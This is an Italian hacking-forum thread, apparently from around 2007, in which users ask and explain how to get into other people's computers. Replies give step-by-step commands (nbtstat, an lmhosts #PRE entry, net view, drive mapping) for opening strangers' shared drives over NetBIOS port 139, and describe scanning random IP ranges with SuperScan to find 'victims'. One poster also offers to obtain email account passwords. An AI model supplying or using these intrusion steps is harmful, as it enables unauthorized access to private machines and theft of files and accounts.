• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

dj-zilmo

Utente Normale
Autore del topic
1 Febbraio 2007
85
42
Miglior risposta
0
RAGASCI COME SI ENTRA NEI PC DAL DOS? O KE PROG CI SN? XFAVORE X I PROG POSTATE QUì I LINK ECC... GRZ!

se per vivere ti dicono siediti e stai zitto tu alzati e muori combattendo >:emoji_slight_smile:

-.-

danasoftmodoq6.jpg

picphp2pz.gif

ke è quella faccia???[:0]

lalali.png

m kiamo 9449...lory9449
[img=left]http://www.cartoonstock.com/lowres/ate0006l.jpg[/img=left]la mia missione???

andare Off Topic...al costo della vita

Ciao! allo
PER TUTTI !!!! :

Prima di tutto l'ip della vittima deve avere la porta 139(ovvero netbios) APERTA!!
In questi esempi facciamo finta ke l'ip della vittima sia 1.2.3.4
Una volta ke avrete l'ip netbiossato fate questo:
1)Aprite il DOS* e scrivete cd c:windows(o dv avete la cartella windows c: d: ecc)
2)Scrivete Nbtstat -A IP vi usciranno diverse voci ad es:

NetBIOS Remote Machine Name Table Name TypeStatus
-------------------------------------------------------------
Gianluca.............<00> UNIQUE .............Registered
WORKGROUP.... . <00> UNIQUE........... . Registered
HALL9000............. <03> UNIQUE .............Registered
HALL9000 .............<20> UNIQUE .............Registered
WORKGROUP.... . <1E> UNIQUE............. Registered

3)Ora prendiamo il 1nome della lista e scriviamo nel DOS:Edit c:windowslmhosts
4)Una volta aperto l'edit inserite la seguente stringa:1.2.3.4GIANLUCA#PRE
Ricordate ke 1.2.3.4 è l'ip della vittima!
Il tag #PRE è fisso e va sempre messo, gli spazi sono fatti col TAB (non usate altro).
5)Salvate e uscite!
6)Riaprite il dos e scrivete cd c:windows
7)Scriviamo Nbtstat -R cn qst comando carikiamo lmhost
8)Vi dovrà  uscire un messaggio!Se nn v esce avete sbagliato qlk!Nel mssg sta scritto qlk tipo cancellazzione nn so ke riuscita!
9)Una volta caricato lmhost scrivete Net View \Gianluca,vi usciranno tt la lista delle risorse condivise ad es:
CDisco
DDisco
EDisco
FDisco
GDisco
HPStampa
Esecuzione comando riuscita.
BINGO!!!!
10)Andate in RISORSE DI RETE e fate STRUMENTI-CONNETTI A UNITà  RETE!
11)Assegnate una lettera al HARD DISK(b,e,f ecc)e inserite cm nome dell unità  rete: \GianlucaC
abbiamo messo C sarebbe l'unita ke ha condiviso in qst caso il suo hard disk!
12)Fate OKe vi aprirà  l'hard disk della vittima!!
Potrete usarlo cm 2 hard disk!Copiare cose incollare ecc!proprio cm se fosse il vostro
Bene!

CIAO !!! BY KK=haKer mirKo !!!!! (hackermirko.altervista.org

http://griffinmania.tk[/size=6]
Ragazzi visitatelo è uno tra i miei tanti siti , ma questo è dedicato ai griffin quindi è il migliore!!!!!
fetch2.gif
firefoxumisti.gif
playboy.gif

che%20du%20palle.gif

A e... se avete bisogno di una pass di una email contattatemi... ( grimaldo@hotmail.it )

[B)][B)][:0][:0][:0][:0][:0]

io nn indovino sempre io nn predico sempre io nn prevedo sempre<h2>io deduco e so sempre</h2></u>

[IMG=left]http://www.sciax2.it/public/upload/vegito-06.gif[/IMG=left]
vegetavsbuu.gif

FRATELLO GEMELLO D DOMENIKO

xD

valerio si sente ferito nel suo orgoglio:emoji_smiley:

io nn indovino sempre io nn predico sempre io nn prevedo sempre<h2>io deduco e so sempre</h2></u>

vegetavsbuu.gif

già !... gle stò a fà  pub. mica niente è.. tra poco se me decido a sceglie un banner bello ( xD ) metto la pub sul mio sito...

pure[xx(]

vegetavsbuu.gif

scusate ero stato in "letargo x°P " cmq grazie 1000

se per vivere ti dicono siediti e stai zitto tu alzati e muori combattendo &gt;:emoji_slight_smile:

qualcuno ha provato e funziona?

.: I rispect to you, tou rispect to me, we respect the rules! :.
RISPETTA IL REGOLAMENTO
Pubblicità  Progresso per un forum migliore promossa dall'amministratore

Gioco di ruolo online The New World presto online su Sciax2.it!!!

io per entrare in alcuni pc faccio così:
eseguo un portscan su un range di ip a caso (con superscan 2.06) per vedere ki ha la porta 139 (quella del netbios) aperta.... se c'è qualke vittima ti dice l'ip e basta ke fai start--esegui--poi digiti \\ipvittima ed ecco ke sei nel suo pc... a me funziona

picphp2pz.gif

banner2.gif

SCS RISPIEGA x°D

se per vivere ti dicono siediti e stai zitto tu alzati e muori combattendo &gt;:emoji_slight_smile:

AHHH ORA O CAPITO WOW 6 UN PAZZO MA E + O - RISKIOSO DI QUELLO NEL DOS?

allora ti scarichi il programma superscan 2.06, poi vai su impostazioni porte o qualcosa del genere e imposti la porta 139. poi fai uno scan di un range di ip a caso (x esempio da 160.0.0.1 a 160.255.0.0.1)e se qualcuno ha la porta 139 aperta te lo dice. Se ci sono vittime segnati l'ip, poi vai su start, esegui, e digiti \\ipvittima ed eccoti nel suo pc (a volte trovi solo stampanti condivise). per qualsiasi problema contattati, sempre pronto ad aiutarti.

picphp2pz.gif

banner2.gif

*-* 6 PAZZO NEL SENZO BUONO CMQ E +, O - RISKIOSO DA QUELLO DEL DOS???

SCS LO CERCO DA TTT LE PARTI IL superscan 2.06 MA E IN INGLESE E NN CI CAPISCO UN BIP XD LO PUOI UPLOADARE?

SCS O CAPITOOOOOOOOOOO OKKKKK KAPITO CMQ 6 UN PAZZO.... MA E RISKIOSO? ( TI PRENDE LA POLIZIA ) x°D ???